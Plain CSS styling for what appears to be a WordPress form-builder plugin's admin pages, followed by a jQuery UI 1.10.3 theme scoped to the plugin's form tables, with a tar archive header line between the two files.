	background: #ccc;
}

.highlight 
{ 
	border: 2px dashed #DDCC7F !important; 
	visibility: visible !important; 
	height: 80px !important; 	
	width: 100% !important; 
	display:inline-block ;
	background:transparent;
}

.wdform-page-button,
.page_numbersform_id_temp {
	border: 1px solid #B3B3B3;
    padding: 2px 15px;
}


.fm-loading-container{
	position:relative;
}
	
.fm-loading-content,
.fm-loading-content::before,
.fm-loading-content::after {
	z-index: 1000;
	position: fixed;
	top: 50%;
	left: 50%;
	border: 1px solid rgb(204,204,204);
	border-left-color: rgb(0,0,0);
	border-radius: 974px;
	-o-border-radius: 974px;
	-ms-border-radius: 974px;
	-webkit-border-radius: 974px;
	-moz-border-radius: 974px;
}

.fm-loading-content {
//	margin: 20% 0;
	height: 49px;
	width: 49px;
	animation: fm-loading-rotate 1150ms linear infinite;
		-o-animation: fm-loading-rotate 1150ms linear infinite;
		-ms-animation: fm-loading-rotate 1150ms linear infinite;
		-webkit-animation: fm-loading-rotate 1150ms linear infinite;
		-moz-animation: fm-loading-rotate 1150ms linear infinite;
}

.fm-loading-content::before {
	content: "";
	margin: -22px 0 0 -22px;
	height: 43px;
	width: 43px;
	animation: fm-loading-rotate 1150ms linear infinite;
		-o-animation: fm-loading-rotate 1150ms linear infinite;
		-ms-animation: fm-loading-rotate 1150ms linear infinite;
		-webkit-animation: fm-loading-rotate 1150ms linear infinite;
		-moz-animation: fm-loading-rotate 1150ms linear infinite;
}

.fm-loading-content::after {
	content: "";
	margin: -28px 0 0 -28px;
	height: 55px;
	width: 55px;
	animation: fm-loading-rotate 2300ms linear infinite;
		-o-animation: fm-loading-rotate 2300ms linear infinite;
		-ms-animation: fm-loading-rotate 2300ms linear infinite;
		-webkit-animation: fm-loading-rotate 2300ms linear infinite;
		-moz-animation: fm-loading-rotate 2300ms linear infinite;
}


@keyframes fm-loading-rotate {
	100% {
		transform: rotate(360deg);
	}
}

@-o-keyframes fm-loading-rotate {
	100% {
		-o-transform: rotate(360deg);
	}
}

@-ms-keyframes fm-loading-rotate {
	100% {
		-ms-transform: rotate(360deg);
	}
}

@-webkit-keyframes fm-loading-rotate {
	100% {
		-webkit-transform: rotate(360deg);
	}
}

@-moz-keyframes fm-loading-rotate {
	100% {
		-moz-transform: rotate(360deg);
	}
}

.fm-user-manual{
	font-size: 14px; 
	font-weight: bold;
	font-style:italic;
	margin:20px 0;
	float:left;
}

.fm-upgrade-pro {
	float: right; 
	text-align: right;
	margin:6px 10px 0 0;
	text-decoration:none;
}

.fm-upgrade-img{
	background: #D8D8D8;
    color: #236592;
    padding: 1px 10px;
    font-weight: bold;
    font-size: 11px;
}

.fm-upgrade-img span{
	background:url("../images/buttons.png") no-repeat 36% 100%;
	display:inline-block;
	width:50px;
	height:50px;
	vertical-align:middle;
	margin-left:5px;
}

.fm-upgrade-pro a {
	color: blue; 
	text-decoration: none;
	box-shadow:none !important;
}

.fm-title {
	float:right;
}


.fm-title span{
	font-size:16px;
}	

.fm-title input{
	width: 261px;
    padding: 4px;
    border: 1px solid #919191;
    height: 36px;
    background: transparent;
    margin: 0;
    display: inline-block;
    vertical-align: middle;
	font-size:14px;
}

input:focus{
    outline: none !important;
}

.fm-page-header {
	padding: 10px 0;
}

.fm-page-title {
	width: 310px;
    font-size: 24px;
    line-height: 24px;
    color: #444;
    float: left;
}

.fm-edit-content {
	background:#fff;
	margin: 20px 0;
	padding: 15px 10px;
}

.fm-drag-and-drop {
	margin-bottom: 10px;
}

.fm-drag-and-drop div{
	padding: 5px 0;
	font-style:italic;
}
  
.fm-drag-and-drop label {
	font-size: 15px; 
	font-weight: bold;
	vertical-align: top;
	margin-right: 10px;
}

fieldset label {
	display: inline !important;
	float: none !important;
}

.fm_modal {
	display:    none;
	position:   fixed;
	z-index:    1000;
	top:        0;
	left:       0;
	height:     100%;
	width:      100%;
	background: rgba( 255, 255, 255, .8 );
}

.ui-progressbar {
	position: relative;
}

#fm-progressbar {
	position: fixed;
	z-index: 1003;
	width: 35%;
	left: 0;
	top: 0;
	bottom: 0;
	right: 0;
	margin: auto;
	font-size: 14px;
	color: #444;
}

#fm-progressbar .ui-progressbar-value {
	background: #3CB9F5;
	border-right: #3CB9F5;
}

.fm-progress-label {
	position: absolute;
	left: 46%;
	top: 4px;
}

.export_progress {
	position: fixed; 
	z-index: 1003; 
	height: 100%;
	width: 100%;
	top: 56%; 
	left: 45%; 
	font-size:15px; 
	color:#000; 
	display:none;
}
css/jquery-ui-spinner.css000060400000113430152434416630011462 0ustar00/*! jQuery UI - v1.10.3 - 2013-05-03
* http://jqueryui.com
* Includes: jquery.ui.core.css, jquery.ui.accordion.css, jquery.ui.autocomplete.css, jquery.ui.button.css, jquery.ui.datepicker.css, jquery.ui.dialog.css, jquery.ui.menu.css, jquery.ui.progressbar.css, jquery.ui.resizable.css, jquery.ui.selectable.css, jquery.ui.slider.css, jquery.ui.spinner.css, jquery.ui.tabs.css, jquery.ui.tooltip.css
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ffDefault=Verdana%2CArial%2Csans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=highlight_soft&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=flat&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=glass&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=glass&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=glass&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=glass&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=glass&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=flat&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=flat&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
* Copyright 2013 jQuery Foundation and other contributors Licensed MIT */

/* Layout helpers
----------------------------------*/
.wdform-field .ui-spinner-input {
  background-color: #FFFFFF;
  height: 30px !important;
}
.wdform_table1 .ui-helper-hidden {
	display: none;
}
.wdform_table1 .ui-helper-hidden-accessible {
	border: 0;
	clip: rect(0 0 0 0);
	height: 1px;
	margin: -1px;
	overflow: hidden;
	padding: 0;
	position: absolute;
	width: 1px;
}
.wdform_table1 .ui-helper-reset {
	margin: 0;
	padding: 0;
	border: 0;
	outline: 0;
	line-height: 1.3;
	text-decoration: none;
	font-size: 100%;
	list-style: none;
}
.wdform_table1 .ui-helper-clearfix:before,
.wdform_table1 .ui-helper-clearfix:after {
	content: "";
	display: table;
	border-collapse: collapse;
}
.wdform_table1 .ui-helper-clearfix:after {
	clear: both;
}
.wdform_table1 .ui-helper-clearfix {
	min-height: 0; /* support: IE7 */
}
.wdform_table1 .ui-helper-zfix {
	width: 100%;
	height: 100%;
	top: 0;
	left: 0;
	position: absolute;
	opacity: 0;
	filter:Alpha(Opacity=0);
}
.wdform_table1 .ui-front {
	z-index: 100;
}


/* Interaction Cues
----------------------------------*/
.wdform_table1 .ui-state-disabled {
	cursor: default !important;
}


/* Icons
----------------------------------*/

/* states and images */
.wdform_table1 .ui-icon {
	display: block;
	text-indent: -99999px;
	overflow: hidden;
	background-repeat: no-repeat;
}


/* Misc visuals
----------------------------------*/

/* Overlays */
.wdform_table1 .ui-widget-overlay {
	position: fixed;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
}
.wdform_table1 .ui-accordion .ui-accordion-header {
	display: block;
	cursor: pointer;
	position: relative;
	margin-top: 2px;
	padding: .5em .5em .5em .7em;
	min-height: 0; /* support: IE7 */
}
.wdform_table1 .ui-accordion .ui-accordion-icons {
	padding-left: 2.2em;
}
.wdform_table1 .ui-accordion .ui-accordion-noicons {
	padding-left: .7em;
}
.wdform_table1 .ui-accordion .ui-accordion-icons .ui-accordion-icons {
	padding-left: 2.2em;
}
.wdform_table1 .ui-accordion .ui-accordion-header .ui-accordion-header-icon {
	position: absolute;
	left: .5em;
	top: 50%;
	margin-top: -8px;
}
.wdform_table1 .ui-accordion .ui-accordion-content {
	padding: 1em 2.2em;
	border-top: 0;
	overflow: auto;
}
.wdform_table1 .ui-autocomplete {
	position: absolute;
	top: 0;
	left: 0;
	cursor: default;
}
.wdform_table1 .ui-button {
	display: inline-block;
	position: relative;
	padding: 0;
	line-height: normal;
	margin-right: .1em;
	cursor: pointer;
	vertical-align: middle;
	text-align: center;
	overflow: visible; /* removes extra width in IE */
}
.wdform_table1 .ui-button,
.ui-button:link,
.ui-button:visited,
.ui-button:hover,
.ui-button:active {
	text-decoration: none;
}
/* to make room for the icon, a width needs to be set here */
.wdform_table1 .ui-button-icon-only {
	width: 2.2em;
}
/* button elements seem to need a little more width */
.wdform_table1 button.ui-button-icon-only {
	width: 2.4em;
}
.wdform_table1 .ui-button-icons-only {
	width: 3.4em;
}
.wdform_table1 button.ui-button-icons-only {
	width: 3.7em;
}

/* button text element */
.wdform_table1 .ui-button .ui-button-text {
	display: block;
	line-height: normal;
}
.wdform_table1 .ui-button-text-only .ui-button-text {
	padding: .4em 1em;
}
.wdform_table1 .ui-button-icon-only .ui-button-text,
.wdform_table1 .ui-button-icons-only .ui-button-text {
	padding: .4em;
	text-indent: -9999999px;
}
.wdform_table1 .ui-button-text-icon-primary .ui-button-text,
.wdform_table1 .ui-button-text-icons .ui-button-text {
	padding: .4em 1em .4em 2.1em;
}
.wdform_table1 .ui-button-text-icon-secondary .ui-button-text,
.wdform_table1 .ui-button-text-icons .ui-button-text {
	padding: .4em 2.1em .4em 1em;
}
.wdform_table1 .ui-button-text-icons .ui-button-text {
	padding-left: 2.1em;
	padding-right: 2.1em;
}
/* no icon support for input elements, provide padding by default */
.wdform_table1 input.ui-button {
	padding: .4em 1em;
}

/* button icon element(s) */
.wdform_table1 .ui-button-icon-only .ui-icon,
.wdform_table1 .ui-button-text-icon-primary .ui-icon,
.wdform_table1 .ui-button-text-icon-secondary .ui-icon,
.wdform_table1 .ui-button-text-icons .ui-icon,
.wdform_table1 .ui-button-icons-only .ui-icon {
	position: absolute;
	top: 50%;
	margin-top: -8px;
}
.wdform_table1 .ui-button-icon-only .ui-icon {
	left: 50%;
	margin-left: -8px;
}
.wdform_table1 .ui-button-text-icon-primary .ui-button-icon-primary,
.wdform_table1 .ui-button-text-icons .ui-button-icon-primary,
.wdform_table1 .ui-button-icons-only .ui-button-icon-primary {
	left: .5em;
}
.wdform_table1 .ui-button-text-icon-secondary .ui-button-icon-secondary,
.wdform_table1 .ui-button-text-icons .ui-button-icon-secondary,
.wdform_table1 .ui-button-icons-only .ui-button-icon-secondary {
	right: .5em;
}

/* button sets */
.wdform_table1 .ui-buttonset {
	margin-right: 7px;
}
.wdform_table1 .ui-buttonset .ui-button {
	margin-left: 0;
	margin-right: -.3em;
}

/* workarounds */
/* reset extra padding in Firefox, see h5bp.com/l */
.wdform_table1 input.ui-button::-moz-focus-inner,
.wdform_table1 button.ui-button::-moz-focus-inner {
	border: 0;
	padding: 0;
}
.wdform_table1 .ui-datepicker {
	width: 17em;
	padding: .2em .2em 0;
	display: none;
}
.wdform_table1 .ui-datepicker .ui-datepicker-header {
	position: relative;
	padding: .2em 0;
}
.wdform_table1 .ui-datepicker .ui-datepicker-prev,
.wdform_table1 .ui-datepicker .ui-datepicker-next {
	position: absolute;
	top: 2px;
	width: 1.8em;
	height: 1.8em;
}
.wdform_table1 .ui-datepicker .ui-datepicker-prev-hover,
.wdform_table1 .ui-datepicker .ui-datepicker-next-hover {
	top: 1px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-prev {
	left: 2px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-next {
	right: 2px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-prev-hover {
	left: 1px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-next-hover {
	right: 1px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-prev span,
.ui-datepicker .ui-datepicker-next span {
	display: block;
	position: absolute;
	left: 50%;
	margin-left: -8px;
	top: 50%;
	margin-top: -8px;
}
.wdform_table1 .ui-datepicker .ui-datepicker-title {
	margin: 0 2.3em;
	line-height: 1.8em;
	text-align: center;
}
.wdform_table1 .ui-datepicker .ui-datepicker-title select {
	font-size: 1em;
	margin: 1px 0;
}
.wdform_table1 .ui-datepicker select.ui-datepicker-month-year {
	width: 100%;
}
.wdform_table1 .ui-datepicker select.ui-datepicker-month,
.wdform_table1 .ui-datepicker select.ui-datepicker-year {
	width: 49%;
}
.wdform_table1 .ui-datepicker table {
	width: 100%;
	font-size: .9em;
	border-collapse: collapse;
	margin: 0 0 .4em;
}
.wdform_table1 .ui-datepicker th {
	padding: .7em .3em;
	text-align: center;
	font-weight: bold;
	border: 0;
}
.wdform_table1 .ui-datepicker td {
	border: 0;
	padding: 1px;
}
.wdform_table1 .ui-datepicker td span,
.wdform_table1 .ui-datepicker td a {
	display: block;
	padding: .2em;
	text-align: right;
	text-decoration: none;
}
.wdform_table1 .ui-datepicker .ui-datepicker-buttonpane {
	background-image: none;
	margin: .7em 0 0 0;
	padding: 0 .2em;
	border-left: 0;
	border-right: 0;
	border-bottom: 0;
}
.wdform_table1 .ui-datepicker .ui-datepicker-buttonpane button {
	float: right;
	margin: .5em .2em .4em;
	cursor: pointer;
	padding: .2em .6em .3em .6em;
	width: auto;
	overflow: visible;
}
.wdform_table1 .ui-datepicker .ui-datepicker-buttonpane button.ui-datepicker-current {
	float: left;
}

/* with multiple calendars */
.wdform_table1 .ui-datepicker.ui-datepicker-multi {
	width: auto;
}
.wdform_table1 .ui-datepicker-multi .ui-datepicker-group {
	float: left;
}
.wdform_table1 .ui-datepicker-multi .ui-datepicker-group table {
	width: 95%;
	margin: 0 auto .4em;
}
.wdform_table1 .ui-datepicker-multi-2 .ui-datepicker-group {
	width: 50%;
}
.wdform_table1 .ui-datepicker-multi-3 .ui-datepicker-group {
	width: 33.3%;
}
.wdform_table1 .ui-datepicker-multi-4 .ui-datepicker-group {
	width: 25%;
}
.wdform_table1 .ui-datepicker-multi .ui-datepicker-group-last .ui-datepicker-header,
.wdform_table1 .ui-datepicker-multi .ui-datepicker-group-middle .ui-datepicker-header {
	border-left-width: 0;
}
.wdform_table1 .ui-datepicker-multi .ui-datepicker-buttonpane {
	clear: left;
}
.wdform_table1 .ui-datepicker-row-break {
	clear: both;
	width: 100%;
	font-size: 0;
}

/* RTL support */
.wdform_table1 .ui-datepicker-rtl {
	direction: rtl;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-prev {
	right: 2px;
	left: auto;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-next {
	left: 2px;
	right: auto;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-prev:hover {
	right: 1px;
	left: auto;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-next:hover {
	left: 1px;
	right: auto;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-buttonpane {
	clear: right;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-buttonpane button {
	float: left;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-buttonpane button.ui-datepicker-current,
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-group {
	float: right;
}
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-group-last .ui-datepicker-header,
.wdform_table1 .ui-datepicker-rtl .ui-datepicker-group-middle .ui-datepicker-header {
	border-right-width: 0;
	border-left-width: 1px;
}
.wdform_table1 .ui-dialog {
	position: absolute;
	top: 0;
	left: 0;
	padding: .2em;
	outline: 0;
}
.wdform_table1 .ui-dialog .ui-dialog-titlebar {
	padding: .4em 1em;
	position: relative;
}
.wdform_table1 .ui-dialog .ui-dialog-title {
	float: left;
	margin: .1em 0;
	white-space: nowrap;
	width: 90%;
	overflow: hidden;
	text-overflow: ellipsis;
}
.wdform_table1 .ui-dialog .ui-dialog-titlebar-close {
	position: absolute;
	right: .3em;
	top: 50%;
	width: 21px;
	margin: -10px 0 0 0;
	padding: 1px;
	height: 20px;
}
.wdform_table1 .ui-dialog .ui-dialog-content {
	position: relative;
	border: 0;
	padding: .5em 1em;
	background: none;
	overflow: auto;
}
.wdform_table1 .ui-dialog .ui-dialog-buttonpane {
	text-align: left;
	border-width: 1px 0 0 0;
	background-image: none;
	margin-top: .5em;
	padding: .3em 1em .5em .4em;
}
.wdform_table1 .ui-dialog .ui-dialog-buttonpane .ui-dialog-buttonset {
	float: right;
}
.wdform_table1 .ui-dialog .ui-dialog-buttonpane button {
	margin: .5em .4em .5em 0;
	cursor: pointer;
}
.wdform_table1 .ui-dialog .ui-resizable-se {
	width: 12px;
	height: 12px;
	right: -5px;
	bottom: -5px;
	background-position: 16px 16px;
}
.wdform_table1 .ui-draggable .ui-dialog-titlebar {
	cursor: move;
}
.wdform_table1 .ui-menu {
	list-style: none;
	padding: 2px;
	margin: 0;
	display: block;
	outline: none;
}
.wdform_table1 .ui-menu .ui-menu {
	margin-top: -3px;
	position: absolute;
}
.wdform_table1 .ui-menu .ui-menu-item {
	margin: 0;
	padding: 0;
	width: 100%;
	/* support: IE10, see #8844 */
	list-style-image: url(data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7);
}
.wdform_table1 .ui-menu .ui-menu-divider {
	margin: 5px -2px 5px -2px;
	height: 0;
	font-size: 0;
	line-height: 0;
	border-width: 1px 0 0 0;
}
.wdform_table1 .ui-menu .ui-menu-item a {
	text-decoration: none;
	display: block;
	padding: 2px .4em;
	line-height: 1.5;
	min-height: 0; /* support: IE7 */
	font-weight: normal;
}
.wdform_table1 .ui-menu .ui-menu-item a.ui-state-focus,
.wdform_table1 .ui-menu .ui-menu-item a.ui-state-active {
	font-weight: normal;
	margin: -1px;
}

.wdform_table1 .ui-menu .ui-state-disabled {
	font-weight: normal;
	margin: .4em 0 .2em;
	line-height: 1.5;
}
.wdform_table1 .ui-menu .ui-state-disabled a {
	cursor: default;
}

/* icon support */
.wdform_table1 .ui-menu-icons {
	position: relative;
}
.wdform_table1 .ui-menu-icons .ui-menu-item a {
	position: relative;
	padding-left: 2em;
}

/* left-aligned */
.wdform_table1 .ui-menu .ui-icon {
	position: absolute;
	top: .2em;
	left: .2em;
}

/* right-aligned */
.wdform_table1 .ui-menu .ui-menu-icon {
	position: static;
	float: right;
}
.wdform_table1 .ui-progressbar {
	height: 2em;
	text-align: left;
	overflow: hidden;
}
.wdform_table1 .ui-progressbar .ui-progressbar-value {
	margin: -1px;
	height: 100%;
}
.wdform_table1 .ui-progressbar .ui-progressbar-overlay {
	background: url("images/animated-overlay.gif");
	height: 100%;
	filter: alpha(opacity=25);
	opacity: 0.25;
}
.wdform_table1 .ui-progressbar-indeterminate .ui-progressbar-value {
	background-image: none;
}
.wdform_table1 .ui-resizable {
	position: relative;
}
.wdform_table1 .ui-resizable-handle {
	position: absolute;
	font-size: 0.1px;
	display: block;
}
.wdform_table1 .ui-resizable-disabled .ui-resizable-handle,
.wdform_table1 .ui-resizable-autohide .ui-resizable-handle {
	display: none;
}
.wdform_table1 .ui-resizable-n {
	cursor: n-resize;
	height: 7px;
	width: 100%;
	top: -5px;
	left: 0;
}
.wdform_table1 .ui-resizable-s {
	cursor: s-resize;
	height: 7px;
	width: 100%;
	bottom: -5px;
	left: 0;
}
.wdform_table1 .ui-resizable-e {
	cursor: e-resize;
	width: 7px;
	right: -5px;
	top: 0;
	height: 100%;
}
.wdform_table1 .ui-resizable-w {
	cursor: w-resize;
	width: 7px;
	left: -5px;
	top: 0;
	height: 100%;
}
.wdform_table1 .ui-resizable-se {
	cursor: se-resize;
	width: 12px;
	height: 12px;
	right: 1px;
	bottom: 1px;
}
.wdform_table1 .ui-resizable-sw {
	cursor: sw-resize;
	width: 9px;
	height: 9px;
	left: -5px;
	bottom: -5px;
}
.wdform_table1 .ui-resizable-nw {
	cursor: nw-resize;
	width: 9px;
	height: 9px;
	left: -5px;
	top: -5px;
}
.wdform_table1 .ui-resizable-ne {
	cursor: ne-resize;
	width: 9px;
	height: 9px;
	right: -5px;
	top: -5px;
}
.wdform_table1 .ui-selectable-helper {
	position: absolute;
	z-index: 100;
	border: 1px dotted black;
}
.wdform_table1 .ui-slider {
	position: relative;
	text-align: left;
}
.wdform_table1 .ui-slider .ui-slider-handle {
	position: absolute;
	z-index: 2;
	width: 1.2em;
	height: 1.2em;
	cursor: default;
}
.wdform_table1 .ui-slider .ui-slider-range {
	position: absolute;
	z-index: 1;
	font-size: .7em;
	display: block;
	border: 0;
	background-position: 0 0;
}

/* For IE8 - See #6727 */
.wdform_table1 .ui-slider.ui-state-disabled .ui-slider-handle,
.wdform_table1 .ui-slider.ui-state-disabled .ui-slider-range {
	filter: inherit;
}
.wdform_table1 .ui-slider-horizontal {
	height: .8em;
}
.wdform_table1 .ui-slider-horizontal .ui-slider-handle {
	top: -.3em;
	margin-left: -.6em;
}
.wdform_table1 .ui-slider-horizontal .ui-slider-range {
	top: 0;
	height: 100%;
}
.wdform_table1 .ui-slider-horizontal .ui-slider-range-min {
	left: 0;
}
.wdform_table1 .ui-slider-horizontal .ui-slider-range-max {
	right: 0;
}

.wdform_table1 .ui-slider-vertical {
	width: .8em;
	height: 100px;
}
.wdform_table1 .ui-slider-vertical .ui-slider-handle {
	left: -.3em;
	margin-left: 0;
	margin-bottom: -.6em;
}
.wdform_table1 .ui-slider-vertical .ui-slider-range {
	left: 0;
	width: 100%;
}
.wdform_table1 .ui-slider-vertical .ui-slider-range-min {
	bottom: 0;
}
.wdform_table1 .ui-slider-vertical .ui-slider-range-max {
	top: 0;
}
.wdform_table1 .ui-spinner {
	position: relative;
	display: inline-block;
	overflow: hidden;
	padding: 0;
	vertical-align: middle;
}
.wdform_table1 .ui-spinner-input {
	border: none;
	background: none;
	color: inherit;
	padding: .2em 0 !important;
	vertical-align: middle;
	padding-left: .4em !important;
	padding-right: 22px !important;
}
.wdform_table1 .ui-spinner-button {
	width: 16px;
	height: 50%;
	font-size: .5em;
	padding: 0;
	margin: 0;
	text-align: center;
	position: absolute;
	cursor: default;
	display: block;
	overflow: hidden;
	right: 0;
}
/* more specificity required here to overide default borders */
.wdform_table1 .ui-spinner a.ui-spinner-button {
	border-top: none;
	border-bottom: none;
	border-right: none;
}
/* vertical centre icon */
.wdform_table1 .ui-spinner .ui-icon {
	position: absolute;
	margin-top: -8px;
	top: 50%;
	left: 0;
}
.wdform_table1 .ui-spinner-up {
	top: 0;
}
.wdform_table1 .ui-spinner-down {
	bottom: 0;
}

/* TR overrides */
.wdform_table1 .ui-spinner .ui-icon-triangle-1-s {
	/* need to fix icons sprite */
	background-position: -65px -16px;
}
.wdform_table1 .ui-tabs {
	position: relative;/* position: relative prevents IE scroll bug (element with position: relative inside container with overflow: auto appear as "fixed") */
	padding: .2em;
}
.wdform_table1 .ui-tabs .ui-tabs-nav {
	margin: 0;
	padding: .2em .2em 0;
}
.wdform_table1 .ui-tabs .ui-tabs-nav li {
	list-style: none;
	float: left;
	position: relative;
	top: 0;
	margin: 1px .2em 0 0;
	border-bottom-width: 0;
	padding: 0;
	white-space: nowrap;
}
.wdform_table1 .ui-tabs .ui-tabs-nav li a {
	float: left;
	padding: .5em 1em;
	text-decoration: none;
}
.wdform_table1 .ui-tabs .ui-tabs-nav li.ui-tabs-active {
	margin-bottom: -1px;
	padding-bottom: 1px;
}
.wdform_table1 .ui-tabs .ui-tabs-nav li.ui-tabs-active a,
.wdform_table1 .ui-tabs .ui-tabs-nav li.ui-state-disabled a,
.wdform_table1 .ui-tabs .ui-tabs-nav li.ui-tabs-loading a {
	cursor: text;
}
.wdform_table1 .ui-tabs .ui-tabs-nav li a, /* first selector in group seems obsolete, but required to overcome bug in Opera applying cursor: text overall if defined elsewhere... */
.wdform_table1 .ui-tabs-collapsible .ui-tabs-nav li.ui-tabs-active a {
	cursor: pointer;
}
.wdform_table1 .ui-tabs .ui-tabs-panel {
	display: block;
	border-width: 0;
	padding: 1em 1.4em;
	background: none;
}
.wdform_table1 .ui-tooltip {
	padding: 8px;
	position: absolute;
	z-index: 9999;
	max-width: 300px;
	-webkit-box-shadow: 0 0 5px #aaa;
	box-shadow: 0 0 5px #aaa;
}
.wdform_table1 body .ui-tooltip {
	border-width: 2px;
}

/* Component containers
----------------------------------*/
.wdform_table1 .ui-widget {
	font-family: Verdana,Arial,sans-serif;
	font-size: 1.1em;
}
.wdform_table1 .ui-widget .ui-widget {
	font-size: 1em;
}
.wdform_table1 .ui-widget input,
.wdform_table1 .ui-widget select,
.wdform_table1 .ui-widget textarea,
.wdform_table1 .ui-widget button {
	font-family: Verdana,Arial,sans-serif;
	font-size: 1em;
}
.wdform_table1 .ui-widget-content {
	border: 1px solid #aaaaaa;
	background: #ffffff url(images/ui-bg_flat_75_ffffff_40x100.png) 50% 50% repeat-x;
	color: #222222;
}
.wdform_table1 .ui-widget-content a {
	color: #222222;
}
.wdform_table1 .ui-widget-header {
	border: 1px solid #aaaaaa;
	background: #cccccc url(images/ui-bg_highlight-soft_75_cccccc_1x100.png) 50% 50% repeat-x;
	color: #222222;
	font-weight: bold;
}
.wdform_table1 .ui-widget-header a {
	color: #222222;
}

/* Interaction states
----------------------------------*/
.wdform_table1 .ui-state-default,
.wdform_table1 .ui-widget-content .ui-state-default,
.wdform_table1 .ui-widget-header .ui-state-default {
	border: 1px solid #d3d3d3;
	background: #e6e6e6 url(images/ui-bg_glass_75_e6e6e6_1x400.png) 50% 50% repeat-x;
	font-weight: normal;
	color: #555555;
}
.wdform_table1 .ui-state-default a,
.wdform_table1 .ui-state-default a:link,
.wdform_table1 .ui-state-default a:visited {
	color: #555555;
	text-decoration: none;
}
.wdform_table1 .ui-state-hover,
.wdform_table1 .ui-widget-content .ui-state-hover,
.wdform_table1 .ui-widget-header .ui-state-hover,
.wdform_table1 .ui-state-focus,
.wdform_table1 .ui-widget-content .ui-state-focus,
.wdform_table1 .ui-widget-header .ui-state-focus {
	border: 1px solid #999999;
	background: #dadada url(images/ui-bg_glass_75_dadada_1x400.png) 50% 50% repeat-x;
	font-weight: normal;
	color: #212121;
}
.wdform_table1 .ui-state-hover a,
.wdform_table1 .ui-state-hover a:hover,
.wdform_table1 .ui-state-hover a:link,
.wdform_table1 .ui-state-hover a:visited {
	color: #212121;
	text-decoration: none;
}
.wdform_table1 .ui-state-active,
.wdform_table1 .ui-widget-content .ui-state-active,
.wdform_table1 .ui-widget-header .ui-state-active {
	border: 1px solid #aaaaaa;
	background: #ffffff url(images/ui-bg_glass_65_ffffff_1x400.png) 50% 50% repeat-x;
	font-weight: normal;
	color: #212121;
}
.wdform_table1 .ui-state-active a,
.wdform_table1 .ui-state-active a:link,
.wdform_table1 .ui-state-active a:visited {
	color: #212121;
	text-decoration: none;
}

/* Interaction Cues
----------------------------------*/
.wdform_table1 .ui-state-highlight,
.wdform_table1 .ui-widget-content .ui-state-highlight,
.wdform_table1 .ui-widget-header .ui-state-highlight {
	border: 1px solid #fcefa1;
	background: #fbf9ee url(images/ui-bg_glass_55_fbf9ee_1x400.png) 50% 50% repeat-x;
	color: #363636;
}
.wdform_table1 .ui-state-highlight a,
.wdform_table1 .ui-widget-content .ui-state-highlight a,
.wdform_table1 .ui-widget-header .ui-state-highlight a {
	color: #363636;
}
.wdform_table1 .ui-state-error,
.wdform_table1 .ui-widget-content .ui-state-error,
.wdform_table1 .ui-widget-header .ui-state-error {
	border: 1px solid #cd0a0a;
	background: #fef1ec url(images/ui-bg_glass_95_fef1ec_1x400.png) 50% 50% repeat-x;
	color: #cd0a0a;
}
.wdform_table1 .ui-state-error a,
.wdform_table1 .ui-widget-content .ui-state-error a,
.wdform_table1 .ui-widget-header .ui-state-error a {
	color: #cd0a0a;
}
.wdform_table1 .ui-state-error-text,
.wdform_table1 .ui-widget-content .ui-state-error-text,
.wdform_table1 .ui-widget-header .ui-state-error-text {
	color: #cd0a0a;
}
.wdform_table1 .ui-priority-primary,
.wdform_table1 .ui-widget-content .ui-priority-primary,
.wdform_table1 .ui-widget-header .ui-priority-primary {
	font-weight: bold;
}
.wdform_table1 .ui-priority-secondary,
.wdform_table1 .ui-widget-content .ui-priority-secondary,
.wdform_table1 .ui-widget-header .ui-priority-secondary {
	opacity: .7;
	filter:Alpha(Opacity=70);
	font-weight: normal;
}
.wdform_table1 .ui-state-disabled,
.wdform_table1 .ui-widget-content .ui-state-disabled,
.wdform_table1 .ui-widget-header .ui-state-disabled {
	opacity: .35;
	filter:Alpha(Opacity=35);
	background-image: none;
}
.wdform_table1 .ui-state-disabled .ui-icon {
	filter:Alpha(Opacity=35); /* For IE8 - See #6059 */
}

/* Icons
----------------------------------*/

/* states and images */
.wdform_table1 .ui-icon {
	width: 16px;
	height: 16px;
}
.wdform_table1 .ui-icon,
.wdform_table1 .ui-widget-content .ui-icon {
	background-image: url(images/ui-icons_222222_256x240.png);
}
.wdform_table1 .ui-widget-header .ui-icon {
	background-image: url(images/ui-icons_222222_256x240.png);
}
.wdform_table1 .ui-state-default .ui-icon {
	background-image: url(images/ui-icons_888888_256x240.png) !important;
}
.wdform_table1 .ui-state-hover .ui-icon,
